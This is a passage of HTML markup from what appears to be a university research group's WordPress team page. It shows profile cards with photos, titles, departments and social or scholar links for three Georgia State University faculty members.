70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 